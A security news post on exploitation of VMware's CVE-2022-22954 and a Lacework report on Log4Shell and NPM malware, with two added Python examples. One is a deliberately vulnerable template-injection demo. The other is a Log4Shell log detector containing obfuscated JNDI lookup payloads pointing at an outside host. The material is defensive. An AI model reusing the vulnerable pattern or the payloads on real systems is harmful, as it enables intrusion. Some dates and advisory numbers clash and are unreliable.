
Software Vendor VMware Patches Critical Bug Exploited in the Wild

 

Malicious actors are actively exploiting a critical bug, tracked as CVE-2022-22954, in VMware Workspace ONE Access and Identity Manager recently addressed by the vendor. The vulnerability is used in active attacks that infect servers with coin miners. 

Earlier this month, VMware rolled out an update to resolve a critical security flaw (CVSS: 9.8) in several of its products, including VMware Workspace ONE Access, VMware Identity Manager (vIDM), vRealize Lifecycle Manager, vRealize Automation, and VMware Cloud Foundation.

The software vendor also warned that an attacker with network access could trigger a server-side template injection that results in RCE. The vulnerability is not unprecedented: in late September 2022, CVE-2021-22005 enabled malicious actors to strike vulnerable systems with RCE attacks, achieving root privileges and reaching the vCenter Server over the network. 

“VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side template injection. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8,” reads the security advisory. “A malicious actor with network access can trigger a server-side template injection that may result in remote code execution.”
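To make the advisory's wording concrete, here is an added illustration (not code from the original post, from VMware, or from the affected products) of what "server-side template injection" means in general. It uses Python's `str.format` as a stand-in template engine: the vulnerable path splices untrusted input into the template string, so template syntax inside the input is evaluated by the engine; the hardened path keeps the template fixed and passes the input in as data. The `AppConfig` class, its secret value and the `greet_*` functions are all constructed for this example.

```python
"""
Added example: server-side template injection, shown with str.format as
a stand-in template engine. Nothing here is VMware code; the names and
the secret value are constructed for illustration.
"""


class AppConfig:
    # Constructed server-side setting that must never reach a client.
    db_password = "constructed-secret-do-not-leak"


def greet_vulnerable(username: str) -> str:
    """BUG: untrusted input is concatenated into the template itself.

    Any '{...}' the user supplies is interpreted by the template engine,
    which here can walk attributes of whatever objects were passed in.
    """
    template = "Welcome, " + username + "!"
    return template.format(config=AppConfig)


def greet_safe(username: str) -> str:
    """Template is a fixed string; user input is substituted as a value.

    Braces inside the value are never re-parsed, so '{config.x}' in the
    input comes back out as literal text.
    """
    template = "Welcome, {name}!"
    return template.format(name=username, config=AppConfig)


def looks_like_template_syntax(value: str) -> bool:
    """Cheap input check a defender can log on: '{', '}' or '${' in a
    field that should be a plain name is worth an alert even when the
    rendering path is already safe."""
    return "{" in value or "}" in value


if __name__ == "__main__":
    probe = "{config.db_password}"
    print("vulnerable:", greet_vulnerable(probe))   # leaks the secret
    print("safe      :", greet_safe(probe))         # echoes literal braces
    print("flagged   :", looks_like_template_syntax(probe))
```

Note that the vulnerable path also breaks on harmless input: a username such as `bob{` raises a `ValueError` from the template engine, which is one reason unexplained template-parse errors in server logs deserve a look.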

“This critical vulnerability should be patched or mitigated immediately per the instructions in VMSA-2021-0011. The ramifications of this vulnerability are serious,” the software vendor said, urging its customers to address the vulnerabilities immediately to prevent their exploitation. 

In the past two weeks, multiple security researchers designed working exploits for CVE-2022-22954, with at least one proof-of-concept exploit released on Twitter. While publishing public exploits raises the risks that threat actors will use them in attacks, they are also meant to help secure systems through testing and serve as validators of existing fixes/patches. 

According to cybersecurity intelligence firm Bad Packets, malicious actors are actively scanning for vulnerable hosts to exploit the flaw in the wild. The IP address used in the payload, 106.246.224.219, was recently seen dropping the Linux Tsunami backdoor in other attacks. However, it remains unclear what the 'one' executable is, as it is no longer accessible. Security researcher Daniel Card also released proof-of-concept exploits on Twitter and stated that the vulnerability was being exploited to deploy coinminer payloads.

Log4Shell is Employed in 31% of Malware infections, Lacework Labs Identifies

 

In the latest cloud threat report by Lacework, it was disclosed that the infamous Log4Shell vulnerability was exploited as an initial infection vector in 31% of cases identified by Lacework researchers over the past six months. 

The software vendor’s report confirms that the Log4j vulnerability was abused extensively by malicious actors, as cybersecurity researchers had suspected when it emerged in December last year. 

According to Lacework Labs, it initially noticed a flood of requests with malicious payloads immediately after the Log4Shell bug was disclosed; these were mostly the result of researchers scanning for the vulnerability. Over time, however, they were replaced by genuinely malicious requests as threat actors adopted publicly available proof-of-concept exploits. 

“Over time, we watched scanning activity evolve into more frequent attacks, including some that deployed crypto-miners and Distributed Denial of Service (DDoS) bots to affected systems,” it explained. “In addition to improving their payloads, adversaries continued to adapt their exploitation methods to stay ahead of signature-based detections used by many types of security products.”
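The report's point about attackers adapting to stay ahead of signature-based detection is easiest to see in the Log4Shell case itself, where a plain `jndi:` string match misses lookups written with Log4j's nested `${lower:...}`, `${upper:...}` and `${...:-...}` forms. The following is an added example (not from the Lacework report or any product) of defender-side detection logic that first resolves those nesting forms and URL encoding, then checks the normalised text. The access-log lines, IP addresses and the `normalise`/`scan_access_log` helpers are all constructed for this example.

```python
"""
Added example: detecting Log4Shell-style JNDI lookups in web access logs
after resolving the nested Log4j lookup forms used to evade simple
signatures. Log lines and addresses below are constructed.
"""
import re
from urllib.parse import unquote

# One nesting layer: ${lower:x}, ${upper:x}, ${::-x}, ${env:NOPE:-x} -> x
_INNER = re.compile(
    r"\$\{(?:(?:lower|upper):([^${}]*)|[^${}]*:-([^${}]*))\}",
    re.IGNORECASE,
)
# What we are actually looking for once the layers are peeled off.
_JNDI = re.compile(r"\$\{\s*jndi\s*:")


def normalise(text: str, max_rounds: int = 10) -> str:
    """URL-decode, then strip nesting layers from the inside out.

    Each round replaces one layer; max_rounds bounds the work on
    adversarial input. The result is lower-cased for matching.
    """
    text = unquote(text)
    for _ in range(max_rounds):
        new = _INNER.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2),
            text,
        )
        if new == text:
            break
        text = new
    return text.lower()


def is_log4shell_attempt(field: str) -> bool:
    """True if the field contains a JNDI lookup after normalisation."""
    return _JNDI.search(normalise(field)) is not None


def scan_access_log(lines):
    """Return (line_number, normalised_line) for every hit."""
    hits = []
    for n, line in enumerate(lines, start=1):
        norm = normalise(line)
        if _JNDI.search(norm):
            hits.append((n, norm))
    return hits


# Constructed Apache-style access log: one benign line, then four
# attempts using progressively more obfuscated lookups.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Dec/2021:10:01:03 +0000] "GET /login HTTP/1.1" 200 88 "-" '
    '"${jndi:ldap://203.0.113.7/a}"',
    '10.0.0.9 - - [12/Dec/2021:10:01:04 +0000] '
    '"GET /?x=${${lower:j}ndi:ldap://203.0.113.7/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [12/Dec/2021:10:01:05 +0000] "GET /api HTTP/1.1" 200 10 "-" '
    '"${${env:NOPE:-j}${::-n}di:ldap://203.0.113.7/c}"',
    '10.0.0.9 - - [12/Dec/2021:10:01:06 +0000] '
    '"GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.7%2Fd%7D HTTP/1.1" 400 0 "-" "-"',
]


if __name__ == "__main__":
    for n, norm in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: {norm}")
```

The normalisation step is the part that matters: a rule matching only the literal `${jndi:` catches line 2 and nothing else, while the same rule applied after `normalise` catches all four attempts. Bounding the number of rounds keeps the check cheap even when someone feeds it deeply nested input.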

In addition to Log4j, multiple threat actors have also used a backdoor in the ua-parser-js NPM package to gain access to Linux systems and launch the XMRig open-source miner. The original hacking group had compromised the NPM developer’s account to push a malicious payload into the package. 

In fact, malicious actors increasingly favor NPM as an attack vector. A report from Checkmarx this week claimed that attackers have simplified the process of creating new NPM accounts from which to distribute supply chain malware. 

“The attacker has fully automated the process of NPM account creation and has opened dedicated accounts, one per package, making his new malicious packages much harder to spot,” it explained. “At the time of writing, the threat actor ‘RED-LILI’ is still active and continues to publish malicious packages.” 

The researchers at Lacework Labs also investigated issues around compliance, compromised Docker APIs and malicious containers, and additional bugs within the software supply chain. Based on the findings of this report, the researchers advised that defenders should evaluate their security infrastructure against industry best practices and pursue proactive defence and threat intelligence, backed by active vulnerability monitoring.